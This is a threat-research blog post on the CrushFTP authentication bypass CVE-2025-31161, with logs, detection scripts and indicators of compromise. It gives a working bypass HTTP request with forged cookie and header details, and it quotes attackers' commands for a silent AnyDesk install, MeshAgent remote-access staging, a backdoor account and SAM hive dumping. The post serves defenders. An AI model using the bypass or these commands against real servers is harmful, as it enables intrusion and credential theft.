TL;DR: CVE-2025-31161 is a critical severity vulnerability allowing attackers to control how user authentication is handled by CrushFTP managed file transfer (MFT) software. We strongly recommend patching immediately; the affected versions are 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0. Successful exploitation of CVE-2025-31161 would give attackers admin-level access across the CrushFTP application for further compromise. This blog outlines our re-created proof-of-concept for CVE-2025-31161 and attackers’ use of both legitimate and malicious RMM tooling for post-exploitation activities.
Special thanks to Tim Kasper, Faith Stratton, Jose Oregon, Matt Anderson, Craig Sweeney, Alden Schmidt, Lindsey Welch, Harlan Carvey, Jamie Levy, and John Hammond for their contributions and support for this analysis.
On 3 April 2025, Huntress observed in-the-wild exploitation of CVE-2025-31161, an authentication bypass vulnerability in versions of the CrushFTP software. We uncovered further post-exploitation activity leveraging the MeshCentral agent and other malware that we will discuss in this writeup. During further analysis, we uncovered potential evidence of compromise as early as 30 March 2025, which seemed to be testing access and did not spawn any external processes from CrushFTP.
In a recent post, the Shadowserver team stated that as of March 30 there were ~1,500 vulnerable instances of CrushFTP publicly exposed to the Internet.
Figure 1: Tweet from Shadowserver Foundation on March 31, 2025
CVE-2025-31161 is a 9.8 CVSS critical severity vulnerability that affects how the CrushFTP file transfer application handles user authentication. At the time of writing, the NIST NVD entry states the description:
CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability in the S3 authorization header processing that allows authentication bypass. Remote and unauthenticated HTTP requests to CrushFTP with known usernames can be used to impersonate a user and conduct actions on their behalf, including administrative actions and data retrieval.
This vulnerability is patched and is mitigated in CrushFTP versions 11.3.1+ and 10.8.4+. Huntress has validated and confirmed the authentication bypass is prevented in patched versions.
Please ensure your own installations of CrushFTP are updated to the latest versions. If your CrushFTP instance is publicly exposed to the open Internet, we strongly recommend you patch immediately.
Upon successful exploitation, an adversary may gain access to the administrator user account for the CrushFTP application, and leverage this to create new backdoor accounts, access files (upload and download), obtain code execution, and achieve full control of the vulnerable server.
The vulnerability was assigned a CVE on March 26, and the Shadowserver Foundation first reported CVE-2025-31161 exploitation activity on March 31. The exploitation of CVE-2025-31161 is indicative of a concerning trend that we’ve seen across several incidents, where threat actors are targeting MFT platforms as a way to deliver disruptive attacks. These platforms are typically external-facing and house sensitive enterprise data, making them a favorite for threat actors. As such, prompt patching is critical. Within our partner base we have seen 148 unique endpoints with the CrushFTP software installed as a service, with 95 of these running major versions 10 and 11. Approximately 72 different companies within our customer base were running unpatched versions of CrushFTP. Customers have been notified of the urgency to upgrade.
Numerous other security firms have discussed CVE-2025-31161 (hat tip to Rapid7 AttackerKB and Outpost24 amongst others) and thanks to their shared insights, Huntress was able to recreate a proof-of-concept (PoC) with ease. The core of this vulnerability is the S3 authentication functionality included as a part of CrushFTP. Due to logic bugs in the underlying source code (which Project Discovery did a fantastic job outlining), a mere Authorization header in an HTTP request is all that is needed to bypass authentication without valid username or password credentials.
Since the technical details of the proof of concept are already public and available, we have no concerns discussing the inner workings of our recreated proof-of-concept.
As stated, it boils down to just an HTTP request:
GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=1111 HTTP/1.1
Cookie: CrushAuth=1111111111_111111111111111111111111111111111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
Connection: close
While this is a simple example to merely list users on the CrushFTP instance, it demonstrates the key components:
Backend functions are accessible and any administrative actions can be performed
A single cookie, CrushAuth must be provided
This does not have to be a valid CrushAuth cookie. The Project Discovery writeup discusses the typical structure of this value, but we have seen success with just a ~31-character string of alphanumeric characters.
The c2f HTTP parameter must match the last 4 characters of the CrushAuth cookie.
The Authorization header relies on the specific string prefix AWS4-HMAC-SHA256, and the Credential field may be set to any valid CrushFTP user account name that does not include a tilde (~), followed by a forward slash (/).
You will most commonly see the username crushadmin as this is the typical default administrator for CrushFTP servers.
In testing, we observed the CrushAuth cookie must still be “known” to the CrushFTP instance -- so a second HTTP request may be necessary if a random/invalid value is forged.
This small proof-of-concept only demonstrates the web-based authentication bypass… further actions and exploitation would be expanded upon by the adversary. In the following sections, we will discuss the tradecraft and post-exploitation used by the threat actors leveraging this vulnerability in the wild.
Across our Huntress partner base, the CrushFTP software is most typically installed within its own program directory commonly placed at the root of a volume (i.e., C:\CrushFTP10 or C:\CrushFTP11, but seen at D:\, E:\, or other drive letters).
Inside of this directory is a CrushFTP.log file, which includes valuable information. In our testing, we used CrushFTP version 10.5.1_12. We have seen the CrushFTP.log file to be the most reliable source to determine the full running version number of the CrushFTP installation. As an example, you may see a log entry like the following:
SERVER|<TIMESTAMP>|Server Memory Stats: <......> :Version 10.5.1_12
If you are unsure of which CrushFTP installation version you are running, be sure to check this file. Additionally, you can review it for any signs of exploitation with some of the indicators we have observed below. These are the very few lines of logs we observed when testing the recreated authentication bypass referenced above:
ACCEPT|<TIMESTAMP>|[HTTP:1_<EPHEMERAL-PORT>:lookup:8080] Accepting connection from:
<ATTACKER-IP-ADDRESS>:<EPHEMERAL-PORT>
POST|<TIMESTAMP>|[HTTP:1_<EPHEMERAL-PORT>:crushadmin:<ATTACKER-IP-ADDRESS>] WROTE: *HTTP/1.1 200 OK*
Bear in mind, this is only a test of bypassing authentication to act as the crushadmin user -- follow-on exploitation may look very different. There is nuance in what artifacts may be found in the logs, depending on the requests made -- if you see activity including the AWS4-HMAC-SHA256 Credential=crushadmin/ string, be sure to look around the entry to make sure there is no reference to a currentAuth cookie value. The currentAuth cookie is included in legitimate login sessions and is not used for the authentication bypass technique.
Additionally, we have seen log files present in the \logs\session_logs directory that may include further details for your own analysis if you believe you may have been compromised.
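The two log checks described above (reading the running version out of CrushFTP.log and spotting an AWS4 Credential header that is not accompanied by a currentAuth cookie) can be scripted. The following is an added example written for this post; it is not Huntress or CrushFTP code. The sample log lines are constructed to mirror the entry shapes quoted above (timestamps and IP addresses are placeholders), and the version ranges follow the NVD description, with fixes in 10.8.4+ and 11.3.1+.

```python
"""Triage helpers for CrushFTP.log and session-log excerpts (added example, not vendor code)."""
import re

# Affected ranges per the NVD description: 10.0.0-10.8.3 and 11.0.0-11.3.0 (inclusive).
AFFECTED = {10: ((10, 0, 0), (10, 8, 3)), 11: ((11, 0, 0), (11, 3, 0))}

VERSION_RE = re.compile(r":Version (\d+)\.(\d+)\.(\d+)(?:_\d+)?")
AUTH_RE = re.compile(r"AWS4-HMAC-SHA256 Credential=([^/\s*]+)/")
CRUSHAUTH_RE = re.compile(r"CrushAuth=(\d+)_([A-Za-z0-9]+)")
C2F_RE = re.compile(r"\bc2f[:=]([A-Za-z0-9]+)")

# Constructed sample of CrushFTP.log (timestamps and IPs are placeholders).
SAMPLE_SERVER_LOG = """\
SERVER|2025-04-03 10:00:00|Server Memory Stats: used=... :Version 10.5.1_12
ACCEPT|2025-04-03 10:00:05|[HTTP:1_50000:lookup:8080] Accepting connection from: 203.0.113.10:50000
POST|2025-04-03 10:00:05|[HTTP:1_50000:crushadmin:203.0.113.10] WROTE: *HTTP/1.1 200 OK*
"""

# Constructed sample of session-log lines: one bypass-style request, then one request
# carrying a currentAuth cookie (i.e. a legitimately established login session).
SAMPLE_SESSION_LOG = """\
READ: *GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=1111 HTTP/1.1*
READ: *Cookie: CrushAuth=1111111111_111111111111111111111111111111111*
READ: *Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/*
WROTE: *HTTP/1.1 200 OK*
READ: *POST /WebInterface/function/ HTTP/1.1*
READ: *Cookie: CrushAuth=1743696851505_BooTB7cPKiinnZ4UBM7Jr819zyodaJ; currentAuth=odaJ*
READ: *command:getUserList*
READ: *c2f:odaJ*
WROTE: *HTTP/1.1 200 OK*
"""


def parse_version(lines):
    """Return (major, minor, patch) from the first ':Version x.y.z' entry, or None."""
    for line in lines:
        m = VERSION_RE.search(line)
        if m:
            return tuple(int(x) for x in m.groups())
    return None


def is_affected(version):
    """True when the version falls inside one of the affected ranges."""
    if version is None:
        return False
    rng = AFFECTED.get(version[0])
    return rng is not None and rng[0] <= version <= rng[1]


def split_requests(lines):
    """Group a GET/POST request line with the READ lines that follow it; a WROTE line ends it."""
    requests, current = [], []
    for line in lines:
        if "READ: *GET " in line or "READ: *POST " in line:
            if current:
                requests.append(current)
            current = [line]
        elif "READ:" in line and current:
            current.append(line)
        elif "WROTE:" in line and current:
            requests.append(current)
            current = []
    if current:
        requests.append(current)
    return requests


def analyse_request(req):
    """Summarise the authentication artifacts of one request."""
    text = "\n".join(req)
    auth, cookie, c2f = AUTH_RE.search(text), CRUSHAUTH_RE.search(text), C2F_RE.search(text)
    finding = {
        "request_line": req[0].strip(),
        "aws4_user": auth.group(1) if auth else None,
        "has_currentAuth": "currentAuth=" in text,
        "c2f_matches_cookie": bool(cookie and c2f and cookie.group(2).endswith(c2f.group(1))),
    }
    # Rule of thumb from the post: an AWS4 Credential header with no currentAuth cookie
    # near it is the bypass pattern; a currentAuth cookie points to a real login session.
    finding["bypass_suspected"] = finding["aws4_user"] is not None and not finding["has_currentAuth"]
    return finding


def find_bypass_indicators(lines):
    """Return findings for requests that look like the CVE-2025-31161 bypass."""
    return [f for f in map(analyse_request, split_requests(lines)) if f["bypass_suspected"]]


if __name__ == "__main__":
    version = parse_version(SAMPLE_SERVER_LOG.splitlines())
    print("version:", version, "affected:", is_affected(version))
    for f in find_bypass_indicators(SAMPLE_SESSION_LOG.splitlines()):
        print("suspected bypass:", f)
```

Run it against your own CrushFTP.log and the files under \logs\session_logs; a hit is a starting point for review, not proof of compromise, since the post notes the exact artifacts vary with the requests the adversary made.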
Here is one occurrence where the threat actor created a new admin account to use as a persistent backdoor:
There are a few things to call out in the log excerpt above:
Note the first two lines, which match the pattern of our recreated PoC artifacts -- and the observed adversary IP address, 172.235.144[.]67.
They leverage the setUserItem function to craft a new user with specified properties. In this case, the backdoor account name is Eaion6Mz.
They change the new user’s password, likely so they could log in later with it.
One neat trick: they set the new user’s last_login time to 06/08/2023 03:04:22 PM in an effort to hide the account and make it look like it was last used years ago.
On another affected host, we observed the threat actor upload and stage the MeshCentral agent to be leveraged for continued remote access, persistence, and further post-exploitation. Other incidents leveraged AnyDesk and one included more bespoke malware.
We will discuss these in further details in the following sections.
Huntress has seen exploitation of CVE-2025-31161 across only four distinct hosts from four different companies. Three of these companies were hosted by the same MSP. The types of companies affected spanned marketing, retail, and semiconductors. While only a small number of our customers were affected, there are known to be 130,000 vulnerable instances left open and exposed to the Internet outside of our purview. Therefore, the true impact of this vulnerability has yet to be determined.
On one host, Huntress observed a threat actor installing a malicious AnyDesk RMM instance post-exploitation, before moving to dump the SAM and System registry hives in an effort to harvest credentials.
The host appeared to be running a vulnerable version of CrushFTP; the threat actors used the CrushFTPService.exe process to install AnyDesk. The following commands were observed setting the stage for the AnyDesk install:
cmd.exe /c "C:\windows\temp\msiinstall.exe --install "C:\windows\temp\Anydesk" --silent"
cmd.exe /c "echo licence_key123 | "C:\windows\temp\Anydesk\AnyDesk.exe" --register-licence"
cmd.exe /c "echo Anydesk@123 | "C:\windows\temp\Anydesk\AnyDesk.exe" --set-password"
Figure 2: Process detection for AnyDesk spawning from CrushFTPService.exe
Figure 3: Process detection for credential dumping with reg.exe
On some hosts, the threat actor was observed deploying MeshAgent as part of the post-exploitation activity. MeshAgent is the agent component of MeshCentral, a legitimate open-source remote monitoring platform, and has previously been used by threat actors for various remote access functionalities, like sending commands, maintaining persistence, and more. The following commands were observed staging the MeshCentral Agent installation:
From the CrushFTP log from one endpoint:
Accepting connection from: 2.58.56.16:50860
READ: *POST /WebInterface/function/ HTTP/1.1*
READ: *User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0*
READ: *Content-Length: 783*
READ: *Cookie: CrushAuth=1743696851505_BooTB7cPKiinnZ4UBM7Jr819zyodaJ; currentAuth=odaJ*
READ: *Priority: u=0*
READ: *command:openFile*
READ: *upload_path:/Windows/Temp/mesch.exe*
READ: *upload_size:3480944*
READ: *upload_id:cisqUUw66Yte*
READ: *start_resume_loc:0*
READ: *c2f:odaJ*
WROTE: *150 Opening BINARY data connection. Ready to write file /Windows/Temp/mesch.exe. S T O R*
WROTE: *HTTP/1.1 200 OK*
...
READ: *POST /WebInterface/function/ HTTP/1.1*
READ: *User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0*
READ: *Content-Length: 904*
READ: *Cookie: CrushAuth=1743696851505_BooTB7cPKiinnZ4UBM7Jr819zyodaJ; currentAuth=odaJ*
READ: *command:closeFile*
READ: *upload_id:cisqUUw66Yte*
READ: *total_chunks:6*
READ: *total_bytes:3480944*
READ: *filePath:/Windows/Temp/mesch.exe*
READ: *lastModified:1743685342000*
READ: *c2f:odaJ*
WROTE: *226-Upload File Size:3480944 bytes @ 1699K/sec. MD5=114c196c39c91575880a5012d06565b1*
WROTE: *226 Transfer complete. MD5=114c196c39c91575880a5012d06565b1 ("/Windows/Temp/mesch.exe" 3480944) STOR*
WROTE: *HTTP/1.1 200 OK*
WROTE: *Content-Length: 138*
WROTE: **
WROTE: *<?xml version="1.0" encoding="UTF-8"?>
<commandResult><response></response><md5>114c196c39c91575880a5012d06565b1</md5></commandResult>*
WROTE: *HTTP/1.1 200 OK*
Note the included use of a currentAuth cookie here -- this indicates the adversary had leveraged CVE-2025-31161 to bypass authentication, but then used their access to log in with a legitimate session.
Once the file was on the endpoint, the following commands were observed via EDR telemetry:
C:\Windows\Temp\mesch.exe run
C:\Windows\Temp\mesch.exe b64exec cmVxdWlyZSgnd2luLWNvbnNvbGUnKS5oaWRlKCk7cmVxdWlyZSgnd2luLWRpc3BhdGNoZXInKS5jb25uZWN0KCczNjg3Jyk7
C:\Windows\Temp\mesch.exe -fullinstall
The base64 string in the second command decodes to:
require('win-console').hide();require('win-dispatcher').connect('3530');
On other affected endpoints, the MeshAgent post-exploitation installation was identical to the above, except that on one endpoint the base64 string decoded to:
require('win-console').hide();require('win-dispatcher').connect('4204');
Soon after the MeshAgent was deployed, a console window was opened (see above), which then added a non-admin user (CrushUser) to the local administrators group:
Figure 4: Signals Showing Post-Exploitation Activities
Within this affected host’s CrushFTP.log file (notice the STOR command for uploading the malicious DLL):
READ: *POST /WebInterface/function/ HTTP/1.1*
READ: *User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0*
READ: *Content-Length: 904*
READ: *Cookie: CrushAuth=1743696851505_BooTB7cPKiinnZ4UBM7Jr819zyodaJ; currentAuth=odaJ*
READ: *command:closeFile*
READ: *upload_id:SE13PFVmTlq0*
READ: *total_chunks:6*
READ: *total_bytes:4358656*
READ: *filePath:/Windows/Temp/d3d11.dll*
READ: *lastModified:1743586788000*
READ: *c2f:odaJ*
WROTE: *226-Upload File Size:4358656 bytes @ 2128K/sec. MD5=1ab5a915e306686a1c7bebd03563a977*
WROTE: *226 Transfer complete. MD5=1ab5a915e306686a1c7bebd03563a977 ("/Windows/Temp/d3d11.dll" 4358656) STOR*
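Both upload excerpts above end with a "226 Transfer complete" line that records the written path, the byte count and an MD5 of the file, which makes these lines a convenient place to pull upload artifacts out of a session log for hash matching. The following is an added example for this post, not Huntress or CrushFTP code. The sample lines are constructed to match the shape quoted above; the mesch.exe path and MD5 are taken from the excerpt earlier in the post, while the second record is a made-up benign upload.

```python
"""Extract completed-upload records from CrushFTP session-log lines (added example, not vendor code)."""
import re

# Matches the '226 Transfer complete. MD5=<hash> ("<path>" <bytes>) STOR' line shape quoted in the post.
TRANSFER_RE = re.compile(r'226 Transfer complete\. MD5=([0-9a-f]{32}) \("([^"]+)" (\d+)\) STOR')

# Heuristics (assumptions for this example): executable file types and temp/staging paths.
SUSPECT_EXT = (".exe", ".dll", ".ps1", ".bat", ".vbs")
STAGING_DIRS = ("/windows/temp/", "/temp/", "/tmp/")

# Constructed sample: first record mirrors the mesch.exe upload quoted above, second is benign.
SAMPLE_LINES = """\
WROTE: *226-Upload File Size:3480944 bytes @ 1699K/sec. MD5=114c196c39c91575880a5012d06565b1*
WROTE: *226 Transfer complete. MD5=114c196c39c91575880a5012d06565b1 ("/Windows/Temp/mesch.exe" 3480944) STOR*
WROTE: *HTTP/1.1 200 OK*
WROTE: *226 Transfer complete. MD5=0123456789abcdef0123456789abcdef ("/Shared/report.pdf" 20480) STOR*
"""


def extract_uploads(lines):
    """Return one dict per completed upload: md5, path and size in bytes."""
    uploads = []
    for line in lines:
        m = TRANSFER_RE.search(line)
        if m:
            uploads.append({"md5": m.group(1), "path": m.group(2), "bytes": int(m.group(3))})
    return uploads


def flag_suspicious(uploads, known_bad_md5=frozenset()):
    """Attach a 'reasons' list to uploads that hit a heuristic or a known-bad MD5."""
    flagged = []
    for upload in uploads:
        path = upload["path"].lower()
        reasons = []
        if path.endswith(SUSPECT_EXT):
            reasons.append("executable file type")
        if any(d in path for d in STAGING_DIRS):
            reasons.append("written to a temp/staging directory")
        if upload["md5"] in known_bad_md5:
            reasons.append("MD5 matches known indicator")
        if reasons:
            flagged.append({**upload, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    records = extract_uploads(SAMPLE_LINES.splitlines())
    for hit in flag_suspicious(records, {"114c196c39c91575880a5012d06565b1"}):
        print(hit)
```

The IOC table at the end of the post lists SHA-256 values, whereas the log records MD5, so a hash match here needs an MD5 list (the MD5s in the log excerpts are the ones available from the post); the path and file-type heuristics work without one.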
After MeshAgent’s installation, another DLL was pulled onto the host. While we didn’t observe execution of this DLL, we can gain some high-level insight from it. It’s a large C++ binary that is an implementation of the open source library TgBot. Unfortunately, at this time we weren’t able to recover the bot token used by this particular sample, as it is likely stored in an external configuration file.
Figure 5: C++ Classes in DLL
In addition to the sample being unstripped, there was also PDB information included, which is a useful pivot to find more associated samples:
Figure 6: PDB Information
This allowed us to find 3 more DLLs that are likely written by the same author, all of which were uploaded to VirusTotal within the last week.
85a1bfebf2a5973ebecd6e5a58c8fab18edfead2c1680ec1e9cce902924c347e
f7c8be827f3bd98b30c5a8d23c1af77f3d0324a9ebcd90104134fc1971751ff7
be6cb5f80b33b9e97622d278a86a99e67b78ccab0b3e554b8430ae5969bcfc0e
While the true intent of this sample still isn’t clear, it is likely that the threat actors are making use of a Telegram bot to collect telemetry from infected hosts. This analysis will be updated as more information becomes available.
Post-exploitation efforts are already thoroughly covered by Huntress detection rules. In response to these intrusions specifically, we crafted detectors to find child processes invoked underneath the CrushFTP service executable:
For community members not yet protected with Huntress, there are two Sigma rules available in the public SigmaHQ repository for:
Detecting “Remote Access Tool - MeshAgent Command Execution via MeshCentral”
Detecting “Remote Access Tool - AnyDesk Silent Installation”
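For readers building their own detections from the command lines quoted in this post (the AnyDesk silent install and password/licence configuration, the MeshAgent b64exec and -fullinstall invocations, the reg.exe hive dump, and anything spawned under CrushFTPService.exe), the following is an added example written for this post. It is neither Huntress detection code nor the SigmaHQ rules named above. The events are constructed: the command lines follow the ones quoted in the post, but the parent image paths, the reg.exe command line (the post only states that SAM and System hives were dumped with reg.exe) and the base64 payload (re-encoded here from the decoded form given above) are assumptions.

```python
"""Process command-line triage for the post-exploitation tradecraft described in the post
(added example, not Huntress or SigmaHQ code)."""
import base64
import binascii
import re

ANYDESK_FLAGS = ("--install", "--silent", "--set-password", "--register-licence")
PORT_RE = re.compile(r"win-dispatcher'\)\.connect\('(\d+)'\)")
# Assumed shape of a hive dump; the post does not quote the exact command line.
REG_SAVE_RE = re.compile(r"\breg(?:\.exe)?\s+save\b.*hklm\\(?:sam|system)\b")
FULLINSTALL_RE = re.compile(r"\s-fullinstall\b")

# Payload text as decoded in the post; re-encoded here so the sample event is self-contained.
MESH_PAYLOAD = "require('win-console').hide();require('win-dispatcher').connect('3530');"
MESH_B64 = base64.b64encode(MESH_PAYLOAD.encode()).decode()

# Constructed telemetry: parent image and command line per event.
SAMPLE_EVENTS = [
    {"parent": r"C:\CrushFTP10\CrushFTPService.exe",
     "cmdline": r'cmd.exe /c "C:\windows\temp\msiinstall.exe --install "C:\windows\temp\Anydesk" --silent"'},
    {"parent": r"C:\CrushFTP10\CrushFTPService.exe",
     "cmdline": r'cmd.exe /c "echo Anydesk@123 | "C:\windows\temp\Anydesk\AnyDesk.exe" --set-password"'},
    {"parent": r"C:\CrushFTP10\CrushFTPService.exe",
     "cmdline": rf"C:\Windows\Temp\mesch.exe b64exec {MESH_B64}"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"C:\Windows\Temp\mesch.exe -fullinstall"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"reg.exe save hklm\sam C:\Windows\Temp\sam.hiv"},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\System32\notepad.exe C:\Users\user\notes.txt"},
]


def decode_b64exec(cmdline):
    """Decode an '<agent> b64exec <base64>' command line; None if the shape does not match."""
    parts = cmdline.split()
    if len(parts) < 3 or parts[1].lower() != "b64exec":
        return None
    try:
        return base64.b64decode(parts[2], validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def classify(event):
    """Return a list of human-readable findings for one process event (empty if nothing matched)."""
    cmd = event["cmdline"]
    lower = cmd.lower()
    findings = []
    if event.get("parent", "").lower().endswith("crushftpservice.exe"):
        findings.append("child process of CrushFTPService.exe")
    if "anydesk" in lower and any(flag in lower for flag in ANYDESK_FLAGS):
        findings.append("AnyDesk silent install/configuration")
    payload = decode_b64exec(cmd)
    if payload is not None:
        m = PORT_RE.search(payload)
        port = m.group(1) if m else "unknown"
        findings.append(f"MeshAgent b64exec payload (win-dispatcher port {port})")
        if "win-console').hide()" in payload:
            findings.append("console window hidden via win-console")
    if FULLINSTALL_RE.search(lower):
        findings.append("MeshAgent full install")
    if REG_SAVE_RE.search(lower):
        findings.append("registry hive saved (SAM/SYSTEM) - credential dumping pattern")
    return findings


def triage(events):
    """Keep only the events that produced findings, preserving input order."""
    results = []
    for event in events:
        findings = classify(event)
        if findings:
            results.append({"cmdline": event["cmdline"], "findings": findings})
    return results


if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(result["cmdline"])
        for finding in result["findings"]:
            print("   -", finding)
```

The parent-process check is the broadest of the rules and the one most worth keeping: a file transfer service has little reason to spawn cmd.exe or an installer, so any child of CrushFTPService.exe deserves a look regardless of what tool it turns out to be.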
If you think you could be impacted, abuse our trial to quickly discover anything shady left behind.
| Indicator | First Observed (YYYY-MM-DD) | Description |
| --- | --- | --- |
| 172.235.144[.]67 | 2025-04-03 | Attacker IP Address |
| 2.58.56[.]16 | 2025-04-03 | Attacker IP Address |
| Eaion6Mz | 2025-04-03 | Backdoor Account Name |
| C:\Windows\Temp\d3d11.dll (SHA-256 be6cb5f80b33b9e97622d278a86a99e67b78ccab0b3e554b8430ae5969bcfc0e) | 2025-04-03 | TgBot DLL |
| C:\Windows\Temp\mesch.exe (SHA-256 9036c92c3ca73cb6ec2da25035322554319288fd2f6db906413011873ad7e281) | 2025-04-03 | MeshAgent Installer Binary |